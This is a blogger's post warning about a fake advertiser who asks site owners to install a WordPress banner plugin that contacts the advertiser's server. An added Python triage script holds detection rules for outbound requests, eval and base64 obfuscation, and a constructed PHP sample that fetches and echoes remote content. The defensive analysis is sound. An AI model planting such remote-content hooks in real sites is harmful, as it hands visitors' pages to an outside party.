
Potentially Malicious Fake Advertiser using Wordpress Plugin (adv.zip)

It starts with an innocuous email:

Hi,

I am sorry I have to write you to e-mail from whois information of the domain. But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site %DOMAIN%
Is it possible to place banner on your site on a fee basis?

Best regards,
Nicolas Gauthier

But it quickly turned strange:

Hi!

Thanks for reply to our proposal!
We like your price. We would like to place 160x600 banner.

To pass to the banner control system follow the link http://webmaster.burgoni.com
To enter use the following data:

login: %DOMAIN%
password: %PASSWORD%

You should install and activate the plugin in order to display advertisement. Before making payment, advertiser must approve location of the banner. The banner will be shown on your site when you add special code to your web-address (for example: http://%DOMAIN%/?adv_test=1). It means, that visitors will see the banner only if it is approved and payment made.

To get installation instruction for your site type pass to: http://docs.burgoni.com/wp_install
To activate your site you have to enter the code: XUT-XUW-7FN

What way of payment is suitable for you?

Best regards,
Nicolas Gauthier.
site: www.burgoni.com
e-mail: ngauthier@burgoni.com
phone: + (0)9 78 62 74 41

I've sold advertising before but I have NEVER installed a plugin. Warning bells go off. I look at the code and it's definitely calling their server but I couldn't find anything explicitly malicious. However, in other stories it's definitely been confirmed they ARE NOT representing La Coste.

Other stories about this scam:
http://www.sleeandtopher.com/warning-bloggers-beware-of-blog-banner-ad-s...
http://keepsafeonthenet.co.uk/2011/07/martin-dumont/

Plugin Source Code:

http://pastebin.com/Gpj5BHiS

But I still can't figure out what they are trying to do. Does anybody have any ideas?
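
A first pass over an untrusted plugin's PHP, of the kind the post describes doing by hand, as an added example (not the plugin's code and not from the original post). The sample plugin text, the host ads.example.invalid and the rule list are constructed for illustration; only the adv_test parameter name comes from the email above.

```python
import re

# Behaviours worth reading closely in a plugin from an unknown sender.
# A hit is a place to start reading, not a verdict.
RULES = {
    "outbound-request": re.compile(
        r"\b(curl_init|curl_exec|fsockopen|file_get_contents|"
        r"wp_remote_get|wp_remote_post|wp_remote_request)\s*\("),
    "dynamic-execution": re.compile(r"\b(eval|assert|create_function)\s*\("),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\("),
    "request-gated": re.compile(r"\$_(?:GET|REQUEST|COOKIE)\s*\[\s*['\"]([^'\"]+)['\"]"),
}
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

def triage(php_source):
    """Return (findings, hosts, params) for the text of one PHP file."""
    findings, hosts, params = [], set(), set()
    for lineno, line in enumerate(php_source.splitlines(), 1):
        hosts.update(h.lower() for h in HOST.findall(line))
        for category, pattern in RULES.items():
            if not pattern.search(line):
                continue
            findings.append((lineno, category, line.strip()))
            if category == "request-gated":
                # Remember which request parameters switch behaviour on.
                params.update(m.group(1) for m in pattern.finditer(line))
    return findings, hosts, params

# Constructed sample, NOT the plugin from the post.
SAMPLE = r'''<?php
/* Plugin Name: Banner Display (constructed sample) */
function banner_show() {
    if (isset($_GET['adv_test'])) {
        $html = file_get_contents('http://ads.example.invalid/banner?site=' . $_SERVER['HTTP_HOST']);
        echo $html;
    }
}
add_action('wp_footer', 'banner_show');
'''

if __name__ == "__main__":
    findings, hosts, params = triage(SAMPLE)
    for lineno, category, text in findings:
        print(f"{lineno:>3}  {category:<18} {text}")
    print("hosts referenced:", sorted(hosts))
    print("request parameters that gate code:", sorted(params))
```

Output that the plugin echoes from a remote host is controlled by whoever runs that host, so the hosts and gating parameters it reports are the first things to check against the sender's claims.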